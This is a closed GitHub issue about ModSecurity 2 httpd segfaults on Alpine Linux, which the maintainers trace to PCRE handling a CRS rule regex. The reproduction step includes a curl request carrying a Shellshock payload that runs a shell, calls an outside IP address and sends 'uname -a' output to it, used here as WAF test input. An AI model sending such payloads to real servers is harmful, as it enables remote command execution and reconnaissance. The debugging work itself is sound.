Investigation report on segfaults with httpd on Alpine Linux #3349

Closed
theseion opened this issue Mar 9, 2025 · 0 comments
Labels
2.x Related to ModSecurity version 2.x bug It is a confirmed bug

Collaborator

theseion commented Mar 9, 2025

@airween and I spent some time analysing reproducible segfaults on Alpine Linux. We were able to track the issue to PCRE but did not investigate further. The segfaults are triggered by some specific regular expressions only, such as the one for CRS rule 934140, in combination with the input length.

Steps to reproduce the issue:

  1. download the tar archive and extract the two scripts
  2. set up a fresh installation of Alpine Linux (do not use LXC, the segfaults did not manifest when we tried that)
  3. copy the setup.sh and run.sh scripts to the newly installed system, e.g., to /tmp
  4. run setup.sh to compile httpd, ModSecurity and set up CRS
  5. run run.sh to configure CRS and httpd and start httpd
  6. run the following curl command against the started httpd:
curl -v localhost:8080/post --data 'arg=()%20{%20:;};%20/bin/sh%20-c%20\"curl%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\\`uname%20-a\\\"+Something+%26%238222%3BThe+Title%26%238221%3B.+After+something'

You'll see an "empty reply" in curl and a segfault in the httpd error log.

@airween and I have decided not to investigate further and to not fix the issue at this time. We are not aware of anyone having encountered this before. We may reconsider if others step forward with the same problem. In addition, ModSecurity 2 is switching to PCRE2 by default and the segfaults do not occur with PCRE2.

alpin-segfault-setup.tar.gz

@theseion theseion added the bug It is a confirmed bug label Mar 9, 2025
@theseion theseion closed this as completed Mar 9, 2025
@theseion theseion added the 2.x Related to ModSecurity version 2.x label Mar 9, 2025